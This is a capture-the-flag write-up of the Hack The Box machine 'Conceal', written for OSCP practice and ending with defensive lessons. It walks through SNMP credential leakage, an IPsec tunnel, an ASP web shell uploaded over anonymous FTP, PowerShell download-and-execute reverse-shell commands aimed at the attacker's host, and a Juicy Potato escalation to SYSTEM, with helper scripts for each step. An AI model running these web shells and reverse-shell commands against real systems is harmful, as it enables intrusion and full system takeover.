This is the 40th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP-like machines compiled by TJ_Null can be found here.
Let’s get started!
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.116 All
- All: Runs all the scans consecutively.
We get back the following result.
root@kali:~/Desktop/htb/conceal# nmapAutomator.sh 10.10.10.116 All
Running all scans on 10.10.10.116
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:19 EST
Nmap done: 1 IP address (1 host up) scanned in 101.60 seconds
---------------------Starting Nmap Basic Scan---------------------
No ports in quick scan.. Skipping!
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:20 EST
Nmap scan report for 10.10.10.116
Host is up (0.051s latency).
Not shown: 999 open|filtered ports
PORT    STATE SERVICE
500/udp open  isakmp
Nmap done: 1 IP address (1 host up) scanned in 188.61 seconds
Making a script scan on UDP ports: 500
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST
/usr/local/bin/nmapAutomator.sh: line 164:  1941 Segmentation fault      $nmapType -sCVU --script vulners --script-args mincvss=7.0 -p$(echo "${udpPorts}") -oN nmap/UDP_"$1".nmap "$1"
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST
Initiating Parallel DNS resolution of 1 host. at 23:23
Completed Parallel DNS resolution of 1 host. at 23:23, 0.02s elapsed
Initiating SYN Stealth Scan at 23:23
Scanning 10.10.10.116 [65535 ports]
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are filtered
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27315.03 seconds
           Raw packets sent: 131070 (5.767MB) | Rcvd: 2 (168B)
Making a script scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 06:59 EST
Error #486: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
---------------------Finished all Nmap scans---------------------
We have one open port.
- Port 500: running isakmp
Before we move on to enumeration, let’s make some mental notes about the scan results.
- I’m not familiar with the service that is running on port 500. A quick Google search tells us that it is the Internet Security Association and Key Management Protocol (ISAKMP), the framework that Internet Key Exchange (IKE) is built on; UDP/500 is the IKE port, and most of the documentation is about configuring IPsec VPNs.
- So there are probably other ports open that we can't see until we establish that VPN connection, because the host filters everything else. To establish it we need some kind of key for authentication, and since this is an HTB box that key has to be findable somewhere. First, let's rerun the nmap scans to see if we missed any ports the first time around.
Enumeration
Rerunning the UDP scan does give us an extra port.
root@kali:~# nmap -vvv -sU -sV 10.10.10.116
....
Discovered open port 161/udp on 10.10.10.116
Port 161 is open. This usually runs the SNMP service. Let’s check that using nmap.
nmap -p 161 -sU -sC -sV 10.10.10.116
- -p: port
- -sU: UDP scan
- -sC: run default scripts
- -sV: version detection
We get back the following result.
The port is running SNMP version 1 and nmap was able to query the service using the default “public” community string. The SNMP scripts list a bunch of listening ports including FTP, HTTP and SMB, but we won't get access to them until we establish the IPsec connection.
For now, we can only interact with the SNMP and ISAKMP ports. Let’s first query SNMP for any sensitive information.
snmpwalk -c public -v 1 10.10.10.116 > snmp-public.txt
- -c: community string
- -v: SNMP version
We get back the following result.
root@kali:~/Desktop/htb/conceal# cat snmp-public.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (305519) 0:50:55.19
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
It leaks the IKE VPN password hash! Someone stored it in the sysContact field (OID 1.3.6.1.2.1.1.4.0), which any SNMP client with the community string can read.
root@kali:~# echo -n 9C8B1A372B1878851BE2C097031B6E43 | wc -c
32
32 hex characters is a 128-bit value, so this looks like an MD5 hash (NTLM has the same length, so the length alone doesn't settle it). Let's use CrackStation to crack it.
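Reading a long snmpwalk dump by eye is error-prone, so here is an added example (my code, not from the original post) that filters the dump for values that mention a password-like keyword or carry a long hex token, and then lists which unsalted digests a bare hex token could be, judged by length. The sample walk is constructed from the lines above; the keyword list and the length table are my own assumptions.

```python
import re
import sys

# Constructed sample, trimmed from the snmpwalk output shown in the post.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.3.0 = Timeticks: (305519) 0:50:55.19
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
"""

# Words admins tend to put next to a secret (assumed list; extend as needed).
KEYWORDS = ("password", "passwd", "pwd", "psk", "secret", "key", "token", "community")
# A bare run of 32..128 hex characters is usually a digest or a raw key.
HEX_TOKEN = re.compile(r"\b[0-9a-fA-F]{32,128}\b")
# Unsalted digests by hex length; MD5 and NTLM both produce 32 hex characters.
HEX_LENGTH_CANDIDATES = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256", "SHA3-256"],
    128: ["SHA-512", "SHA3-512"],
}
# "<oid> = <TYPE>: <value>"; the TYPE part is absent for empty strings.
LINE_RE = re.compile(r'^(?P<oid>\S+)\s*=\s*(?:(?P<type>[A-Za-z-]+):\s*)?(?P<value>.*)$')


def parse_walk(text):
    """Return (oid, type, value) triples; quoted STRING values are unquoted."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        value = m.group("value")
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        rows.append((m.group("oid"), m.group("type") or "", value))
    return rows


def find_credential_leaks(text):
    """Values that mention a secret-like keyword or contain a long hex token."""
    hits = []
    for oid, _typ, value in parse_walk(text):
        lowered = value.lower()
        keywords = [k for k in KEYWORDS if k in lowered]
        hex_tokens = HEX_TOKEN.findall(value)
        if keywords or hex_tokens:
            hits.append({"oid": oid, "value": value, "keywords": keywords, "hex_tokens": hex_tokens})
    return hits


def candidate_hashes(token):
    """Digest candidates by length only; length is a weak signal, treat it as a hint."""
    if not re.fullmatch(r"[0-9a-fA-F]+", token):
        return []
    return HEX_LENGTH_CANDIDATES.get(len(token), [])


if __name__ == "__main__":
    # Usage: python3 snmp_triage.py snmp-public.txt   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WALK
    for hit in find_credential_leaks(text):
        print(f"{hit['oid']}  keywords={hit['keywords']}")
        print(f"    {hit['value']}")
        for tok in hit["hex_tokens"]:
            print(f"    {tok} -> {len(tok)} hex chars, could be {candidate_hashes(tok)}")
```

Feed it the snmp-public.txt from the walk above; on this box it flags only the sysContact line and reports the token as 32 hex characters, which is what sends us to an MD5 lookup.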
Now that we have a plaintext password, let’s try and establish a connection to the VPN.
First run ike-scan to determine the IKE implementation and configuration that the host is using.
ike-scan -M 10.10.10.116
- -M: multiline
We get back the following result.
Next, we’ll use strongswan to establish the IPsec connection. This does not come preinstalled on Kali. To install it, run the following command.
apt-get install strongswan
We have to make changes to two files: ipsec.secrets and ipsec.conf.
In the /etc/ipsec.secrets, add the following entry.
10.10.14.7 10.10.10.116 : PSK "Dudecake1!"
In the /etc/ipsec.conf, add the following entry.
conn conceal
    authby=secret              # authenticate with the PSK from ipsec.secrets
    auto=route                 # install the policy now; negotiate when traffic first matches it
    keyexchange=ikev1          # the target speaks IKEv1 (ike-scan)
    ike=3des-sha1-modp1024     # phase 1 proposal; take this from the ike-scan output
    left=10.10.14.7            # our address
    right=10.10.10.116         # the target
    type=transport             # transport mode, host to host, no tunnel
    esp=3des-sha1              # phase 2 (ESP) proposal
    rightprotoport=tcp         # only TCP to the target is protected; UDP and ICMP still go in the clear
Then run the following command to establish the connection.
root@kali:~# ipsec up conceal
generating QUICK_MODE request 1899279807 [ HASH SA No ID ID ]
sending packet: from 10.10.14.7[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.7[500] (188 bytes)
parsed QUICK_MODE response 1899279807 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{32}
CHILD_SA conceal{33} established with SPIs cea2f2d0_i fbdc1ee6_o and TS 10.10.14.7/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 1899279807 [ HASH ]
connection 'conceal' established successfully
Perfect, the connection was established successfully. Now let’s try and run an nmap scan.
root@kali:~/Desktop/htb/conceal# nmap 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:24 EST
Nmap scan report for 10.10.10.116
Host is up (0.047s latency).
All 1000 scanned ports on 10.10.10.116 are filtered
Nmap done: 1 IP address (1 host up) scanned in 49.03 seconds
The default TCP SYN scan (-sS) still shows everything filtered, but a TCP connect scan (-sT) works.
root@kali:~/Desktop/htb/conceal# nmap -sT 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:26 EST
Nmap scan report for 10.10.10.116
Host is up (0.042s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.65 seconds
The difference is where the packets are built. A SYN scan crafts its own packets and sends them as raw frames underneath the kernel's IP stack, so they never pass through the IPsec policy we just installed: they leave in the clear and the target's firewall drops them exactly as before. A connect scan uses the normal socket API, so the kernel matches the outgoing TCP segments against the transport-mode policy and wraps them in ESP, and the target accepts them. The same rule applies to every tool from here on: anything that goes through the OS socket stack is protected, raw-packet tooling is not. With that settled, let's run a more comprehensive TCP connect scan.
root@kali:~/Desktop/htb/conceal# nmap -sC -sV -sT -o nmap-vpn.text 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 20:39 EST
Nmap scan report for 10.10.10.116
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m18s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-28T01:41:47
|_  start_date: 2020-02-27T01:56:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.89 seconds
More Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.
We get the default Windows Microsoft IIS welcome page. The page source doesn’t contain any sensitive information.
Next, run gobuster to enumerate directories/files.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.116 -o gobuster.txt
- dir: directory mode
- -w: wordlist
- -u: URL
- -o: output file
We get back the following result.
Gobuster finds an /upload directory. Visit it in the browser.
It doesn't contain anything (no listing, no files). Let's see if we can upload files through FTP and whether they land there.
Port 21 FTP
The nmap scan showed anonymous login is allowed.
root@kali:~/Desktop/htb/conceal/upload# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
Let’s test if we’re allowed to upload files. Create a test.txt file on the attack machine.
echo "hello" > test.txt
Upload the test.txt file on the FTP server.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (78.5740 kB/s)
The upload was successful. Let’s see if we can execute the file from the /upload directory on the web server.
Perfect! The file is served from /upload, so the FTP root maps onto the web root's /upload directory. According to the nmap scan this is IIS 10, which can execute classic ASP and ASP.NET (ASPX) pages when those handlers are enabled. Let's test which ones are.
Create a test.aspx file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
We get an HTTP error saying that the file can't be served because of the extension configuration (IIS's 404.3 response: no handler is mapped for .aspx). The upload itself worked; it's execution that's blocked, so ASPX is out. Next, let's try an ASP file.
Create a test.asp file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
Perfect, it does execute ASP code! We’ll use this to gain an initial foothold on the system.
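The upload-then-request loop above is worth automating, because on a real engagement you want to know for every candidate extension whether the server ignores it, serves it as static text, or executes it. The script below is an added example (my code, not from the original post): it uploads one tiny probe per extension over anonymous FTP, fetches each back under the web path, and classifies the response. Each probe asks the engine to compute 6*7, so an executed page echoes 42 while a static one echoes the expression. The marker strings, the extension list and the anonymous password are my choices; the FTP-root-to-/upload mapping is what the post demonstrates.

```python
import ftplib
import io
import urllib.error
import urllib.request

# One small file per extension (assumed set; add php, cgi, ... as the target suggests).
# Each server-side engine evaluates 6*7; a file served as static content comes back verbatim.
# .txt is the control: it has no engine, so it must come back unchanged.
PROBES = {
    "txt":  "PROBE-6*7-END",
    "asp":  "PROBE-<%= 6*7 %>-END",
    "aspx": "PROBE-<%= 6*7 %>-END",
}
EXECUTED = "PROBE-42-END"


def classify(status, body):
    """Label what the web server did with an uploaded probe file."""
    if status == 404:
        return "not-served"      # IIS answers 404.3 when no handler is mapped for the extension
    if status != 200:
        return f"http-{status}"
    if EXECUTED in body:
        return "executes"
    if "PROBE-" in body and "-END" in body:
        return "static"
    return "unknown"


def ftp_put(host, name, content, user="anonymous", password="anon@example.com"):
    """Upload a small text file over plain FTP (as on this box)."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login(user, password)
        ftp.storbinary(f"STOR {name}", io.BytesIO(content.encode()))


def http_get(url):
    """Return (status, body) and do not raise on HTTP error responses."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def probe(ftp_host, web_base):
    """Upload every probe, fetch it back under web_base, and classify the answer."""
    results = {}
    for ext, content in PROBES.items():
        name = f"probe_{ext}.{ext}"
        ftp_put(ftp_host, name, content)
        status, body = http_get(f"{web_base.rstrip('/')}/{name}")
        results[ext] = classify(status, body)
    return results


if __name__ == "__main__":
    # Targets are the box's addresses; edit them for another host.
    for ext, verdict in probe("10.10.10.116", "http://10.10.10.116/upload").items():
        print(f"{ext:5} -> {verdict}")
```

Against this box you would expect txt and aspx to come back as static and not-served, and asp as executes. Delete the probe files over FTP afterwards; leaving executable content in a writable web directory is exactly the condition we are exploiting.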
Initial Foothold
Create a cmd.asp file on the attack machine that contains the following simple web shell.
<%
' Classic ASP (VBScript): spawn cmd.exe through WScript.Shell and return its stdout
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
The above code executes the whoami command and outputs it on the screen. Upload the cmd.asp file on the FTP server and view it on the browser.
We have code execution! Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
cp ../../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following line to the end of the script with the attack machine configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234
When called, this sends a reverse shell back to our attack machine on port 1234.
Setup a listener to receive the reverse shell.
nc -nlvp 1234
Next, change the cmd.asp file to download the PowerShell script and execute it.
<%
' Same shell, but the command now fetches and runs the reverse-shell script.
' Exec blocks until powershell exits, so the browser request hangs for as long as the shell lives.
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Start up a Python web server in the directory that the shell script resides in (Python 2 shown; on Python 3 use python3 -m http.server 5555).
python -m SimpleHTTPServer 5555
Upload the cmd.asp file on the FTP server and view it on the browser.
We get a shell! Grab the user.txt flag.
Privilege Escalation
Run the systeminfo command.
PS C:\Users\Destitute\Desktop> systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 27/02/2020, 01:56:19
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,154 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,213 MB
Virtual Memory: In Use: 986 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::4e1:f9b6:e5da:2f16
[03]: dead:beef::71d9:f571:4c90:5dc7
[04]: dead:beef::18b2:9ba4:e093:98b9
[05]: dead:beef::4e1:f9b6:e5da:2f16
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
We’re on a Microsoft Windows 10 Enterprise 64-bit OS, build 15063 (version 1703), with no hotfixes listed. Let’s first check the privileges held by this user (whoami /priv).
SeImpersonatePrivilege is enabled, so we’re very likely to get SYSTEM using Juicy Potato. Service identities such as the IIS application pool account and the SQL Server service account hold this privilege by design: it lets the service impersonate the client that authenticated to it. Juicy Potato abuses that: it coaxes a SYSTEM-owned DCOM server into authenticating to a local listener it controls, captures the resulting SYSTEM token, and uses the impersonation privilege to start a process with it. One caveat worth knowing: Microsoft closed this trick in Windows 10 1809 / Server 2019 (build 17763 and later), so always check the build first. This box is 15063, so it's still in play.
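Because the two checks above (is the token privilege there, is the build old enough) decide whether Juicy Potato is worth uploading at all, here is an added example (my code, not from the original post) that parses whoami /priv and systeminfo output and gives a verdict. The whoami /priv sample is constructed to look like a typical IIS application-pool identity, since the post only shows a screenshot; the OS Version line is copied from the systeminfo output above. The build cutoff is a fact about Juicy Potato, the verdict labels are my own.

```python
import re
import sys

# Constructed sample of `whoami /priv` for an IIS app-pool identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
# The OS Version line as systeminfo printed it on this box.
SAMPLE_SYSTEMINFO = "OS Name:  Microsoft Windows 10 Enterprise\nOS Version:  10.0.15063 N/A Build 15063\n"

# Either privilege lets a process launch something under a token it has obtained.
TOKEN_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")
# Windows 10 1809 / Server 2019 is build 17763; from there on Juicy Potato's DCOM
# trick no longer works and a newer potato (PrintSpoofer, RoguePotato) is needed.
JUICY_POTATO_LAST_BUILD = 17762

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
BUILD_RE = re.compile(r"^OS Version:\s+\d+\.\d+\.(\d+)", re.MULTILINE)


def parse_privs(text):
    """Map privilege name -> 'Enabled' or 'Disabled' from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_build(systeminfo_text):
    """Windows build number from systeminfo's 'OS Version' line, or None if absent."""
    m = BUILD_RE.search(systeminfo_text)
    return int(m.group(1)) if m else None


def assess_juicy_potato(privs, build):
    """Decide whether Juicy Potato is worth trying.
    A privilege that is present but 'Disabled' still counts: a process can enable a
    privilege that is in its token with AdjustTokenPrivileges; what matters is presence."""
    have = {p: privs[p] for p in TOKEN_PRIVS if p in privs}
    if not have:
        verdict = "no-token-privilege"
    elif build is None:
        verdict = "unknown-build"
    elif build > JUICY_POTATO_LAST_BUILD:
        verdict = "blocked-by-build"
    else:
        verdict = "likely"
    return {"verdict": verdict, "token_privileges": have, "build": build}


if __name__ == "__main__":
    # Usage: python3 potato_check.py priv.txt sysinfo.txt   (falls back to the samples)
    priv_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WHOAMI_PRIV
    sys_text = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_SYSTEMINFO
    print(assess_juicy_potato(parse_privs(priv_text), parse_build(sys_text)))
```

On the target, whoami /priv > priv.txt and systeminfo > sysinfo.txt give the two inputs; for this box the verdict is likely, which is why the next step is to fetch the binary.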
Let’s test it out. Grab the Juicy Potato executable from here and transfer it to the target machine using the following command.
(new-object net.webclient).downloadfile('http://10.10.14.7:5555/JuicyPotato.exe', 'C:\Users\Destitute\Desktop\jp.exe')
Run the executable file to view the arguments it takes.
It requires 3 mandatory arguments.
- -t: create process call: t for CreateProcessWithTokenW, u for CreateProcessAsUser, * to try both. We’ll use *.
- -p: the program to run. We’ll create a batch file that sends a reverse shell back to our attack machine.
- -l: COM server listen port. Any free local port will do; we’ll use 4444.
First copy the Invoke-PowerShellTcp.ps1 script once again into your current directory.
cp ../../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell-2.ps1
Add the following line to the end of the script with the attack configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666
When called, this sends a reverse shell back to our attack machine on port 6666.
Next, create a shell.bat file that downloads the above shell-2.ps1 PowerShell script and runs it.
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell-2.ps1')
Then download the shell.bat file on the target machine.
(new-object net.webclient).downloadfile('http://10.10.14.7:5555/shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')
Setup a listener on the attack machine to receive the reverse shell.
nc -nlvp 6666
Then run the Juicy Potato executable. This should attempt to get a token that impersonates SYSTEM and then run our shell.bat file with elevated privileges.
PS C:\Users\Destitute\Desktop> ./jp.exe -t * -p shell.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
COM -> recv failed with error: 10038
It fails with the default CLSID ({4991d34b-80a1-4291-83b6-3328366b9097}, the BITS service). We can enumerate the CLSIDs on our system using this script. However, let’s first manually try one of the Windows 10 Enterprise CLSIDs listed on the Juicy Potato github repo.
Rerun the Juicy Potato executable with the above specific CLSID.
PS C:\Users\Destitute\Desktop> ./jp.exe -p shell.bat -l 4444 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 4444
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
We get a shell back with SYSTEM privileges!
root@kali:~# nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.116] 49720
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
Grab the root.txt flag.
Lessons Learned
To gain an initial foothold on the box we exploited three vulnerabilities.
- Outdated version of SNMP and the use of the default SNMP community string. The community string is the only thing standing between a client and the MIB, so it is effectively a password. Using the default “public” string, we were able to query SNMP and read the IKE VPN password hash out of the sysContact field. The administrator should have used SNMPv3, the only version that provides real authentication and encryption, and in any case should never have put a secret, hashed or not, into a field that exists to be read. If version 1 or 2c is necessary, the community string must be changed to something that is not guessable and the service should be reachable only from the monitoring host.
- Weak authentication credentials. The shared secret used to establish the IPsec connection was cracked in seconds by an online lookup of its unsalted MD5 hash. The administrator should have used a long, random pre-shared key, or better, certificate-based (RSA/ECDSA) IKE authentication so there is no shared secret to leak at all.
- Insecure configuration of the FTP server that allowed anonymous login and file upload into the web root. The administrator should have disabled anonymous access to the FTP server. If anonymous access was necessary, the FTP root should have been read-only and kept outside any directory IIS serves, so an uploaded file could never be reached, let alone executed, over HTTP.
To escalate privileges we didn’t exploit a bug so much as an intended design: the IIS worker identity holds SeImpersonatePrivilege, and Juicy Potato turns that into a SYSTEM token. There are still protections to put in place for such accounts: run application pools under the least-privileged identity that works, don't grant the impersonation privileges to accounts that don't need them, block writable web directories as above so the foothold never happens, and keep Windows current, since the DCOM behaviour Juicy Potato relies on was removed in Windows 10 1809 / Server 2019.
Conclusion
40 machines down, 6 more to go!
Author : Puckiestyle